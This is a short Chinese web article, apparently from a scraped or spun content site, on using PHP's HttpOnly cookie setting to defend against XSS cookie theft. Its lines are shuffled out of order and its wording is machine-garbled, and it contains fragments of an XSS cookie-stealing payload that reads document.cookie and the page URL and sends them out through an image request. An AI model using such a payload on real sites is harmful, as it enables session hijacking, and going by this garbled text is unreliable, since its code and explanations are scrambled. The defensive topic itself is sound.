xss防御之php利用httponly防xss攻击
来源:诚信在线    发布时间:2017-06-24 10:53:42

  session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

  header("Set-Cookie: hidden=value; httpOnly");

  url=document.top.location.href;

  cookie=document.cookie;

  //大概setcookie()的第七个参数设置为true

  ini_set("session.cookie_httponly", 一);

  以下js猎取cookie信息:

  对付PHP5.一之前版本的PHP经由过程:

  末了,HttpOnly不是全能的!

  一样平常cookie都是从document工具外获得的,目前浏览器正在配置Cookie的时分正常皆担当一个叫做HttpOnly的参数,跟domain等其余参数同样,一旦这个HttpOnly被配置,您正在浏览器的document工具外便看不到Cookie了。

  复制代码 代码以下:

  c=new Image();

  PHP配置HttpOnly:

  你大概感兴趣的文章:详解HTTP Cookie形态管理机制PHP配置Cookie的HTTPONLY属性办法

  c.src=''+cookie+'&u='+url;

  复制代码 代码以下:

  复制代码 代码以下:

  //正在php.ini外,session.cookie_httponly = ture 去开启全局的Cookie的HttpOnly属性

  xss的观点便不必多道了,它的迫害是极大的,那便意味着一旦您的网站呈现xss缝隙,便能够实行随便的js代码,最可骇的是攻击者使用js猎取cookie或session挟制,要是此处里包罗了大批敏感信息(身份信息,管理员信息)等,这完了。。。


诚信在线 除注明原创以外,其余均来自互联网以及微信朋友圈,如有侵权请联系站长立即删除!
文章地址:http://www.my517517.com/ZB/20170624294.html



上一篇:PHP数据库链接类PDOAccess实例分享 下一篇:Aptana 非常不错的Javascript 编辑开发工具 下载